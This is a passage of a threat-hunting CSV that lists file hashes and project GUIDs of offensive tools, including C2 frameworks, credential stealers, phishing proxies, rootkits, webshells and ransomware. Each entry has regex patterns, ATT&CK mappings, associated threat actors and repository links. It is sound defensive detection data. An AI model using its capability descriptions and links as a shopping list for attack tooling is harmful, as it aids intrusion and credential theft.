"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27478"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27479"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27480"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27481"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27482"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27483"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27484"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27485"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27486"
"*5d28c6c9ac74ea6b7ac401d75886e304a858f62efba888b825fea94e4660d4f2*",".{0,1000}5d28c6c9ac74ea6b7ac401d75886e304a858f62efba888b825fea94e4660d4f2.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","27488"
"*5d2e0f4adc5e3bb1f154c9f22eee2cf15e0bb2c5815653e3d97cb1e97c99c326*",".{0,1000}5d2e0f4adc5e3bb1f154c9f22eee2cf15e0bb2c5815653e3d97cb1e97c99c326.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#filehash","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","27489"
"*5d34161be5f0c623d9810e39c594ee72f65ca74b9730f57ad6675c13d81e6d3f*",".{0,1000}5d34161be5f0c623d9810e39c594ee72f65ca74b9730f57ad6675c13d81e6d3f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27491"
"*5D3EF551-3D1F-468E-A75B-764F436D577D*",".{0,1000}5D3EF551\-3D1F\-468E\-A75B\-764F436D577D.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#GUIDproject","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","27492"
"*5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306*",".{0,1000}5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","27493"
"*5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050*",".{0,1000}5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","27494"
"*5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8*",".{0,1000}5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27495"
"*5D48347779833123E9FCCBCDC58ECE0FC301F05BCA0EDAFD34DE4F2693DC5E59*",".{0,1000}5D48347779833123E9FCCBCDC58ECE0FC301F05BCA0EDAFD34DE4F2693DC5E59.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27496"
"*5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa*",".{0,1000}5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27497"
"*5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4*",".{0,1000}5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27498"
"*5D4E7C1F-4812-4038-9663-6CD277ED9AD4*",".{0,1000}5D4E7C1F\-4812\-4038\-9663\-6CD277ED9AD4.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#GUIDproject","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","27499"
"*5d593ef77ff46bf12da1f807f85c0971ffb44916c275a12829b5fcb4b95dfe05*",".{0,1000}5d593ef77ff46bf12da1f807f85c0971ffb44916c275a12829b5fcb4b95dfe05.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27500"
"*5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d*",".{0,1000}5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27501"
"*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*",".{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","27502"
"*5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5*",".{0,1000}5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27503"
"*5d718f2a4cb244409b90df00bca8dd43b57e5892743f203f0f382eb863b1d8f4*",".{0,1000}5d718f2a4cb244409b90df00bca8dd43b57e5892743f203f0f382eb863b1d8f4.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","27504"
"*5d7d828bad9b38218b3eee49222c7759318cf7156d8a90aa94022468897b14e8*",".{0,1000}5d7d828bad9b38218b3eee49222c7759318cf7156d8a90aa94022468897b14e8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27505"
"*5d80699a96aa3f8d7530f5dc55c4719b2470171539fcd957a6940811b18d5e1c*",".{0,1000}5d80699a96aa3f8d7530f5dc55c4719b2470171539fcd957a6940811b18d5e1c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27506"
"*5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579*",".{0,1000}5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27508"
"*5d9056bbe4482693b730e587f475256b0e706c3b4a820368f58084aa7d158e25*",".{0,1000}5d9056bbe4482693b730e587f475256b0e706c3b4a820368f58084aa7d158e25.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27511"
"*5d974cc94472018668a57f0ba0e66282466ced01f69445542bba4a4da479e298*",".{0,1000}5d974cc94472018668a57f0ba0e66282466ced01f69445542bba4a4da479e298.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27512"
"*5d975e81c68574849bb0fec4c6d2116a4ba7dd58bdd1710463ab75d9a8054bc3*",".{0,1000}5d975e81c68574849bb0fec4c6d2116a4ba7dd58bdd1710463ab75d9a8054bc3.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#filehash","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","27513"
"*5d9b00a706436f93d927799d4dff0f1b53af9a10bf3bfe0c7918595783f3ddf6*",".{0,1000}5d9b00a706436f93d927799d4dff0f1b53af9a10bf3bfe0c7918595783f3ddf6.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27514"
"*5da0734623d5c9fa77825167f2d7f6b041d48087e5a93156e97135f68e4cce97*",".{0,1000}5da0734623d5c9fa77825167f2d7f6b041d48087e5a93156e97135f68e4cce97.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27515"
"*5da47804835b0d8e787353d8660ada4903f9971aafa864d651bf7ccdec3ee16d*",".{0,1000}5da47804835b0d8e787353d8660ada4903f9971aafa864d651bf7ccdec3ee16d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27516"
"*5da8e20e1e3a1b63c62d573e8e86316315dffef2b07ca365d0e74552de74b5ed*",".{0,1000}5da8e20e1e3a1b63c62d573e8e86316315dffef2b07ca365d0e74552de74b5ed.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27517"
"*5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92*",".{0,1000}5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27518"
"*5db320e5c5cbbc14478fc1d7c7ae33cfff92877fc585f83a3d7a981a00e9b4f4*",".{0,1000}5db320e5c5cbbc14478fc1d7c7ae33cfff92877fc585f83a3d7a981a00e9b4f4.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27519"
"*5db3498c96a63ebbf02ce68726110bdc2111cdd4d8bbd3e75d37e8055e8cb3e7*",".{0,1000}5db3498c96a63ebbf02ce68726110bdc2111cdd4d8bbd3e75d37e8055e8cb3e7.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27520"
"*5db4c8112942c658a4f14d16fff13781dd705273c0050b2ada09ec79c7cb7c87*",".{0,1000}5db4c8112942c658a4f14d16fff13781dd705273c0050b2ada09ec79c7cb7c87.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","#filehash","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","27521"
"*5dba56860b0d684c8aa7bd7d872e31b87ecf7a98c1c1a696b537d63a402aaf53*",".{0,1000}5dba56860b0d684c8aa7bd7d872e31b87ecf7a98c1c1a696b537d63a402aaf53.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27523"
"*5dc10484e657c478f1740c45b19bb1e46a0edee7c4c89da9977359cce0a4958f*",".{0,1000}5dc10484e657c478f1740c45b19bb1e46a0edee7c4c89da9977359cce0a4958f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27525"
"*5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95*",".{0,1000}5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27528"
"*5de705eec2460c614edf09cf700176ae09ca862cd8233535b70f2c9d7307a8e0*",".{0,1000}5de705eec2460c614edf09cf700176ae09ca862cd8233535b70f2c9d7307a8e0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27532"
"*5de78ea9-73a8-4c53-9d5e-3a893e439a3a*",".{0,1000}5de78ea9\-73a8\-4c53\-9d5e\-3a893e439a3a.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#GUIDproject","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","27533"
"*5DE7F97C-B97B-489F-A1E4-9F9656317F94*",".{0,1000}5DE7F97C\-B97B\-489F\-A1E4\-9F9656317F94.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#GUIDproject","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","27534"
"*5dec1cfe7c0c2ec55c17fb44b43f7d14*",".{0,1000}5dec1cfe7c0c2ec55c17fb44b43f7d14.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","27535"
"*5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0*",".{0,1000}5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27536"
"*5ded9901c45d1280311766c52ae096dfefb0204b2ac89f415e310097860e8ec1*",".{0,1000}5ded9901c45d1280311766c52ae096dfefb0204b2ac89f415e310097860e8ec1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27537"
"*5df2061e118e67da27199797b696b33b0176f35d155b2a1204b4fd11ea6d25bb*",".{0,1000}5df2061e118e67da27199797b696b33b0176f35d155b2a1204b4fd11ea6d25bb.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","#filehash","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","27538"
"*5df212be068f9aa481bf48ce088445d2740a15cbdc35e31c3953f5aa27660c92*",".{0,1000}5df212be068f9aa481bf48ce088445d2740a15cbdc35e31c3953f5aa27660c92.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27539"
"*5df59d3aeb2b438458b5dfe2a8f0bbc15da03a6c222d9cf57aff6df5f682ee31*",".{0,1000}5df59d3aeb2b438458b5dfe2a8f0bbc15da03a6c222d9cf57aff6df5f682ee31.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","#filehash","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","27540"
"*5dfe5309135b7c12dcadee7bc3631bd4fffb37979dd7495758a68939e89db575*",".{0,1000}5dfe5309135b7c12dcadee7bc3631bd4fffb37979dd7495758a68939e89db575.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27541"
"*5e00926cb43b56a330532ce5c4f0988172d49d28840ed490526976a7b2ea2479*",".{0,1000}5e00926cb43b56a330532ce5c4f0988172d49d28840ed490526976a7b2ea2479.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#filehash","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","27542"
